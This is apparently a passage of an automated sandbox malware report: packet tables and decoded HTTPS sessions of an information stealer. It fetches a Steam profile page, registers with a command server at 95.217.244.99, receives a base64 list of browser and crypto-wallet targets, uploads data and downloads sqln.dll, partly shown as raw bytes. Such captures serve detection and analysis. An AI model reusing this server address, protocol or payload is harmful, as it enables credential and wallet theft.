Apr 23, 2024 21:44:27.142522097 CEST	49729	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:27.142998934 CEST	49729	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:27.143016100 CEST	443	49729	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:27.575754881 CEST	443	49729	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:27.575908899 CEST	49729	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:28.959867954 CEST	49729	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:28.959908962 CEST	443	49729	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:28.960095882 CEST	49729	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:28.960110903 CEST	443	49729	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:28.960189104 CEST	49729	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:28.960201025 CEST	443	49729	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:28.960207939 CEST	49729	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:28.960211992 CEST	443	49729	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:28.960239887 CEST	49729	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:28.960246086 CEST	443	49729	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:28.960335970 CEST	49729	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:28.960350037 CEST	443	49729	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:28.960371017 CEST	49729	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:28.960378885 CEST	443	49729	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:28.960407019 CEST	49729	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:28.960412025 CEST	443	49729	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:28.960475922 CEST	49729	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:28.960525036 CEST	49729	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:28.960558891 CEST	49729	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:28.960577965 CEST	443	49729	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:28.960652113 CEST	443	49729	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:28.960665941 CEST	49729	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:28.960724115 CEST	49729	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:28.960860968 CEST	443	49729	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:28.961020947 CEST	443	49729	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:30.670851946 CEST	443	49729	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:30.670964956 CEST	443	49729	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:30.671076059 CEST	49729	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:30.671369076 CEST	49729	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:30.671369076 CEST	49729	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:30.675590992 CEST	49730	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:30.675693035 CEST	443	49730	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:30.675791025 CEST	49730	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:30.676016092 CEST	49730	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:30.676054955 CEST	443	49730	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:30.983994007 CEST	49729	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:30.984034061 CEST	443	49729	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:31.111653090 CEST	443	49730	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:31.111742973 CEST	49730	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:31.112407923 CEST	49730	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:31.112464905 CEST	443	49730	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:31.112631083 CEST	49730	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:31.112646103 CEST	443	49730	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:31.952150106 CEST	443	49730	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:31.952245951 CEST	443	49730	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:31.952425957 CEST	49730	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:31.952425957 CEST	49730	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:31.952675104 CEST	49730	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:31.952703953 CEST	443	49730	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:31.954699039 CEST	49731	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:31.954737902 CEST	443	49731	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:31.954818010 CEST	49731	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:31.955064058 CEST	49731	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:31.955073118 CEST	443	49731	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:32.387017965 CEST	443	49731	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:32.387074947 CEST	49731	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:32.387650967 CEST	49731	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:32.387656927 CEST	443	49731	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:32.387840986 CEST	49731	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:32.387845039 CEST	443	49731	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:33.233505011 CEST	443	49731	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:33.233587027 CEST	49731	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:33.233597040 CEST	443	49731	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:33.233659029 CEST	49731	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:33.233891964 CEST	49731	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:33.233911037 CEST	443	49731	95.217.244.99	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 23, 2024 21:43:55.701896906 CEST	63863	53	192.168.2.6	1.1.1.1
Apr 23, 2024 21:43:55.806906939 CEST	53	63863	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 23, 2024 21:43:55.701896906 CEST	192.168.2.6	1.1.1.1	0xd540	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 23, 2024 21:43:55.806906939 CEST	1.1.1.1	192.168.2.6	0xd540	No error (0)	steamcommunity.com		23.47.27.74	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

95.217.244.99

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49699	23.47.27.74	443	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-23 19:43:56 UTC	119	OUT	GET /profiles/76561199677575543 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-04-23 19:43:56 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Tue, 23 Apr 2024 19:43:56 GMT Content-Length: 33800 Connection: close Set-Cookie: sessionid=9ce6bb0c33a1c9c8edaf7039; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C514997ac8292ce85a02847656e86f088; Path=/; Secure; HttpOnly; SameSite=None
2024-04-23 19:43:56 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-04-23 19:43:56 UTC	10062	IN	Data Raw: 6f 77 6e 20 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6c 69 6e 6b 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 70 75 6c 6c 64 6f 77 6e 22 20 6f 6e 63 6c 69 63 6b 3d 22 53 68 6f 77 4d 65 6e 75 28 20 74 68 69 73 2c 20 27 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 27 2c 20 27 72 69 67 68 74 27 20 29 3b 22 3e 6c 61 6e 67 75 61 67 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6c 6f 63 6b 5f 6e 65 77 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 3e 0d 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6f 64 79 20 70 6f 70 75 70 5f 6d 65 6e 75 22 3e 0d 0a 09 09 09 09 09 09 Data Ascii: own global_action_link" id="language_pulldown" onclick="ShowMenu( this, 'language_dropdown', 'right' );">language</span><div class="popup_block_new" id="language_dropdown" style="display: none;"><div class="popup_body popup_menu">
2024-04-23 19:43:56 UTC	9224	IN	Data Raw: 74 6e 65 72 2e 73 74 65 61 6d 67 61 6d 65 73 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 41 54 53 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 70 61 72 74 6e 65 72 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 49 4e 54 45 52 4e 41 4c 5f 53 54 41 54 53 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 65 61 6d 73 74 61 74 73 2e 76 61 6c 76 65 2e 6f 72 67 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 49 4e 5f 43 4c 49 45 4e 54 26 71 75 6f 74 3b 3a 66 61 6c 73 65 2c 26 71 75 6f 74 3b 55 53 45 5f 50 4f 50 55 50 53 26 71 75 6f 74 3b 3a 66 61 6c 73 65 2c 26 71 75 6f 74 3b 53 54 4f 52 45 5f 49 Data Ascii: tner.steamgames.com\/","STATS_BASE_URL":"https:\/\/partner.steampowered.com\/","INTERNAL_STATS_BASE_URL":"https:\/\/steamstats.valve.org\/","IN_CLIENT":false,"USE_POPUPS":false,"STORE_I

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49701	95.217.244.99	443	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-23 19:43:57 UTC	170	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.244.99 Connection: Keep-Alive Cache-Control: no-cache
2024-04-23 19:43:57 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Apr 2024 19:43:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-23 19:43:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49705	95.217.244.99	443	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-23 19:43:58 UTC	262	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDAKJKEHDBGHIDHIEHDB User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.244.99 Content-Length: 279 Connection: Keep-Alive Cache-Control: no-cache
2024-04-23 19:43:58 UTC	279	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 46 31 41 37 33 42 43 33 37 43 33 31 32 39 31 33 31 31 31 33 31 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d Data Ascii: ------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="hwid"3F1A73BC37C31291311131-a33c7340-61ca-11ee-8c18-806e6f6e6963------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------
2024-04-23 19:43:59 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Apr 2024 19:43:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-23 19:43:59 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 30 7c 39 35 32 33 61 61 36 36 33 35 62 30 32 62 32 35 64 33 33 30 66 32 31 30 64 64 39 38 32 37 62 62 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|0\|9523aa6635b02b25d330f210dd9827bb\|1\|1\|1\|0\|0\|50000\|00

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49708	95.217.244.99	443	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-23 19:43:59 UTC	262	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJKKFIJKFCAKJJJKJKFI User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.244.99 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-23 19:43:59 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4b 4b 46 49 4a 4b 46 43 41 4b 4a 4a 4a 4b 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 32 33 61 61 36 36 33 35 62 30 32 62 32 35 64 33 33 30 66 32 31 30 64 64 39 38 32 37 62 62 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4b 46 49 4a 4b 46 43 41 4b 4a 4a 4a 4b 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4b 46 49 4a 4b 46 43 41 4b 4a 4a 4a 4b 4a 4b 46 49 0d 0a 43 6f 6e 74 Data Ascii: ------HJKKFIJKFCAKJJJKJKFIContent-Disposition: form-data; name="token"9523aa6635b02b25d330f210dd9827bb------HJKKFIJKFCAKJJJKJKFIContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------HJKKFIJKFCAKJJJKJKFICont
2024-04-23 19:44:00 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Apr 2024 19:44:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-23 19:44:00 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49711	95.217.244.99	443	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-23 19:44:01 UTC	262	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIEBFHCAKFBGDHIDHIDB User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.244.99 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-23 19:44:01 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 32 33 61 61 36 36 33 35 62 30 32 62 32 35 64 33 33 30 66 32 31 30 64 64 39 38 32 37 62 62 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 0d 0a 43 6f 6e 74 Data Ascii: ------GIEBFHCAKFBGDHIDHIDBContent-Disposition: form-data; name="token"9523aa6635b02b25d330f210dd9827bb------GIEBFHCAKFBGDHIDHIDBContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------GIEBFHCAKFBGDHIDHIDBCont
2024-04-23 19:44:01 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Apr 2024 19:44:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-23 19:44:01 UTC	5165	IN	Data Raw: 31 34 32 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1420TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49712	95.217.244.99	443	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-23 19:44:02 UTC	263	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDAKJKEHDBGHIDHIEHDB User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.244.99 Content-Length: 7797 Connection: Keep-Alive Cache-Control: no-cache
2024-04-23 19:44:02 UTC	7797	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 32 33 61 61 36 36 33 35 62 30 32 62 32 35 64 33 33 30 66 32 31 30 64 64 39 38 32 37 62 62 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74 Data Ascii: ------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="token"9523aa6635b02b25d330f210dd9827bb------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------IDAKJKEHDBGHIDHIEHDBCont
2024-04-23 19:44:03 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Apr 2024 19:44:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-23 19:44:03 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49713	95.217.244.99	443	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-23 19:44:03 UTC	178	OUT	GET /sqln.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.244.99 Connection: Keep-Alive Cache-Control: no-cache
2024-04-23 19:44:04 UTC	248	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Apr 2024 19:44:03 GMT Content-Type: application/octet-stream Content-Length: 2459136 Last-Modified: Mon, 22 Apr 2024 11:42:56 GMT Connection: close ETag: "66264d40-258600" Accept-Ranges: bytes
2024-04-23 19:44:04 UTC	16136	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 